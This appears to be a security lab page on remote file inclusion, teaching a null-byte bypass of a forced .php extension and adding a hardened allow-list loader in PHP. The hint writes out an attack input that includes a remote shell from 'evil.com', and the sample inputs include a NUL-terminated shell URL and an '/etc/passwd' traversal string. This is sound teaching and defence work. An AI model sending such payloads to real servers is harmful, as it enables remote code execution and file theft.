RFI Lab 2 - Null Byte Extension Bypass


Theme Selector

This page loads templates via ?template=name and always appends .php.

Can you include a remote file despite the forced extension?

Templates: default | dark


Dark template loaded.

Resolved file: dark.php

Hint

The server appends .php to your input. In PHP < 5.3.4, a null byte (%00) terminates the path string when it reaches the underlying C string handling, so the appended .php extension is dropped.
Try: ?template=http://evil.com/shell%00
The server would include http://evil.com/shell instead of http://evil.com/shell.php.
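
The truncation described in the hint, next to a loader that is not affected by it. This is an added example, not the lab's source code: the function names, the templates/ directory and the example.test host are assumptions, and legacy_effective_path() only simulates what PHP < 5.3.4 passed to the file layer.

```php
<?php
// Added example (not the lab's code). Names and paths below are assumptions.

const TEMPLATE_DIR = __DIR__ . '/templates';      // assumed template directory
const ALLOWED_TEMPLATES = ['default', 'dark'];    // the two templates the page lists

// Simulates the path PHP < 5.3.4 effectively opened for
//   include $_GET['template'] . '.php';
// The C layer stopped reading at the first NUL, so the suffix was lost.
function legacy_effective_path(string $input): string
{
    $built = $input . '.php';
    $nul = strpos($built, "\0");
    return $nul === false ? $built : substr($built, 0, $nul);
}

// Hardened resolver: the request value is only ever compared against a fixed
// list, so it never becomes part of a path or URL handed to include.
function resolve_template(string $name): ?string
{
    if (strpos($name, "\0") !== false) {
        return null;                              // NUL byte is never valid here
    }
    if (!in_array($name, ALLOWED_TEMPLATES, true)) {
        return null;                              // unknown name, URL, traversal
    }
    return TEMPLATE_DIR . '/' . $name . '.php';
}

// Constructed sample inputs (already URL-decoded, as PHP would see them).
$samples = [
    'dark',
    "dark\0",
    "http://example.test/shell\0",
    '../../etc/passwd',
];

foreach ($samples as $s) {
    printf(
        "input=%s\n  legacy path : %s\n  hardened    : %s\n",
        json_encode($s, JSON_UNESCAPED_SLASHES),
        legacy_effective_path($s),
        resolve_template($s) ?? 'rejected'
    );
}
```

Keeping allow_url_include set to Off in php.ini also stops include from fetching http:// targets, independent of the null byte behaviour.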